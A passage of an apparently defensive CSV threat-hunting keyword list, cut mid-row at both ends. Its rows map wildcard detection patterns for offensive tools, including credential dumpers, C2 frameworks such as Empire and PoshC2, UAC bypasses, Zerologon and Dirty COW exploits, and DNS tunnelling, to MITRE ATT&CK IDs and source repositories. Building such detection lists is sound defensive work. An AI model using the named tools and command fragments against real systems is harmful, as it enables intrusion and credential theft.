TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-WCMDump*,offensive_tool_keyword,Invoke-WCMDump,PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user,T1003 - T1003.003 - T1003.001 - T1552,TA0006 - TA0006 - TA0006 - TA0006,N/A,N/A,Credential Access,https://github.com/peewpw/Invoke-WCMDump,1,1,N/A,N/A,8,708,132,2017-12-12T00:46:33Z,2017-12-09T21:36:59Z -*Invoke-WCMDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-WebRequest https://tinyurl.com/*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Invoke-WebRequest ifconfig.me/ip*Content.Trim(),greyware_tool_keyword,powershell,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*Invoke-WebRev.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Whisker*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-WindowsUpdateCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-WinEnum*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WinEnum.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WinEnum.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WinlogonCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-WinlogonCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-winPEAS*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-winPEAS*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-winrmsession*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WireTap*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-WlanProfilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-WmiCommand *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-WmiCommand*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*invoke-wmiexec *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WMIExec*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-WMIExec*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*invoke-wmijspayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*invoke-wmipayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WmiShadowCopy*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Invoke-WScriptBypassUAC*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-WScriptBypassUAC*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WScriptBypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WscriptElevate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WScriptBypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ZeroLogon*,offensive_tool_keyword,Invoke-ZeroLogon,Zerologon CVE exploitation,T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004,TA0001 - TA0004 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY/Invoke-ZeroLogon,1,1,N/A,N/A,3,203,46,2020-10-14T04:42:58Z,2020-09-17T05:01:46Z -*Invoke-Zerologon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoking CreateSvcRpc (by @x86matthew*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*io_dirtycow.c*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*io_dirtycow.so*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*iocnglnmfkgfedpcemdflhkchokkfeii*,greyware_tool_keyword,sVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*iodine -*,offensive_tool_keyword,iodine,tunnel IPv4 over DNS tool,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iodined -*,offensive_tool_keyword,iodine,tunnel IPv4 over DNS tool,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iolonopooapdagdemdoaihahlfkncfgg*,greyware_tool_keyword,Azino VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*iomoath/PowerShx*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*ionide *,offensive_tool_keyword,iodine,iodine. iodined - tunnel IPv4 over DNS,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ionided *,offensive_tool_keyword,iodine,iodine. iodined - tunnel IPv4 over DNS,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ios7tojohn.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ip l set dev * address *:*:*,greyware_tool_keyword,ip,changing mac address with ip,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*ip link set ligolo up*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ip link set ligolo up*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ip route add * dev ligolo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ip tuntap add user root mode tun ligolo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*IPeerToPeerService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*IPfuscation.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*IPfuscation.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*ipscan 1*.255*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 10.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 172.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 192.168.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan.exe -*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan-win64-*.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,1,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*iptables -t nat -A REDSOCKS*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*IReversePortForwardService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*irkjanm/krbrelayx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*irs.exe -*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 